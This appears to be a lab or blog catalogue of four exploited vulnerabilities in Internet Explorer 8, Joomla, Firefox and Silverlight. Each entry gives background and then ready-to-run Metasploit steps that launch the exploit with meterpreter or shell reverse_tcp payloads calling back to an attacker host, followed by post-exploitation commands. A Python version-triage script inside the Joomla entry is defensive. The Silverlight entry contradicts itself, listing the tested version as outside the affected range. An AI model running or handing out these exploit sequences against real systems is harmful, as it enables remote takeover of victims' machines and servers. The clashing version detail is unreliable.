CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Timeline :

Vulnerability discovered being exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor on 2013-07-09
Metasploit PoC provided on 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

Windows 7 SP1 with Internet Explorer 8

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function then passes the invalid reference on to the next functions, and it is eventually used in mshtml!CElement::Doc when it tries to call the object’s SecurityContext virtual function at offset +0x70, which results in a crash. An attacker can take advantage of this by first creating a CAnchorElement object, letting it be freed, and then replacing the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2015-8562 Joomla HTTP Header Unauthenticated RCE

Timeline :

Vulnerability discovered being exploited in the wild
Patched by the vendor on 2015-12-14
Metasploit PoC provided on 2015-12-16

PoC provided by :

Marc-Alexandre Montpas
Christian Mehlmauer

Reference(s) :

CVE-2015-8562
20151201

Affected version(s) :

All Joomla versions from 1.5.0 to 3.4.5 inclusive.
To exploit this vulnerability, PHP must also be vulnerable to the deserialisation vulnerability.

Tested on :

Joomla 3.4.5 on Linux ubuntu-1210 with PHP 5.4.6-1ubuntu1

Description :

Joomla suffers from an unauthenticated remote code execution vulnerability that affects all versions from 1.5.0 to 3.4.5. Because user-supplied headers are stored in the database’s session table, it’s possible to truncate the input by sending a UTF-8 character. The custom-created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
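The version conditions above can be turned into an inventory check. This is an added example, not code from the original post, Joomla or Metasploit; the function names and the sample inventory are constructed, and it assumes that a later revision in the same distro package series keeps the backported fix.

```python
import re

# Upstream PHP releases carrying the deserialisation fix, per branch (from the text above).
FIXED_UPSTREAM = {(5, 4): (5, 4, 45), (5, 5): (5, 5, 29), (5, 6): (5, 6, 13)}
# Distro packages named above: package series prefix -> first fixed revision.
# Assumption: a higher trailing revision in the same series still has the fix.
FIXED_PACKAGES = {"5.5.9+dfsg-1ubuntu4.": 13, "5.3.10-1ubuntu3.": 20, "5.4.45-0+deb7u": 1}
JOOMLA_FIRST, JOOMLA_LAST = (1, 5, 0), (3, 4, 5)

def parse_version(text):
    """Leading dotted numeric part of a version string as a 3-tuple."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(g or 0) for g in m.groups())

def has_backport(php_version):
    """True if the string is a distro package at or past a known fixed revision."""
    pkg = php_version.strip()
    for prefix, first_fixed in FIXED_PACKAGES.items():
        rest = pkg[len(prefix):]
        if pkg.startswith(prefix) and rest.isdigit():
            return int(rest) >= first_fixed
    return False

def php_unpatched(php_version):
    """True if this PHP build predates the session-deserialisation fix."""
    if has_backport(php_version):
        return False  # upstream number looks old, but the distro backported the fix
    v = parse_version(php_version)
    if v[:2] <= (5, 3):
        return True  # "before 5.4.45 (including 5.3.x)"
    fixed = FIXED_UPSTREAM.get(v[:2])
    return fixed is not None and v < fixed

def joomla_affected(joomla_version):
    return JOOMLA_FIRST <= parse_version(joomla_version) <= JOOMLA_LAST

def triage(joomla_version, php_version):
    if not joomla_affected(joomla_version):
        return "joomla-not-in-affected-range"
    if php_unpatched(php_version):
        return "exposed"
    return "joomla-unpatched-php-fixed"  # still upgrade Joomla itself

if __name__ == "__main__":
    # Constructed inventory: (host label, Joomla version, PHP version string)
    for host, joomla, php in [("web1", "3.4.5", "5.4.6-1ubuntu1"),
                              ("web2", "3.4.5", "5.5.9+dfsg-1ubuntu4.13"),
                              ("web3", "3.4.6", "5.3.29")]:
        print(host, triage(joomla, php))
```

Comparing only the upstream version number would misreport hosts running the patched Ubuntu and Debian packages, which is why the package strings named above are checked first.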

Commands :

use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.6.143
set PAYLOAD php/meterpreter/reverse_tcp 
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 on 2013-05-12
Patched by the vendor on 2013-08-06
Metasploit PoC provided on 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All Mozilla Firefox versions from 15 to 22 inclusive.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate JavaScript-related vulnerabilities to ultimately inject malicious JavaScript code into a context running with chrome:// privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp 
set LHOST 192.168.6.138
exploit

SYSTEMINFO

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor on 2013-03-12
PoC provided by Vitaliy Toropov on 2013-10-23
Discovered being exploited in exploit kits on 2013-11-13
Metasploit PoC provided on 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 below version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists in the Initialize() method of System.Windows.Browser.ScriptObject, which accesses memory in an unsafe manner. Since it is accessible to untrusted (user-controlled) code, it’s possible to dereference arbitrary memory, which can easily be leveraged for arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid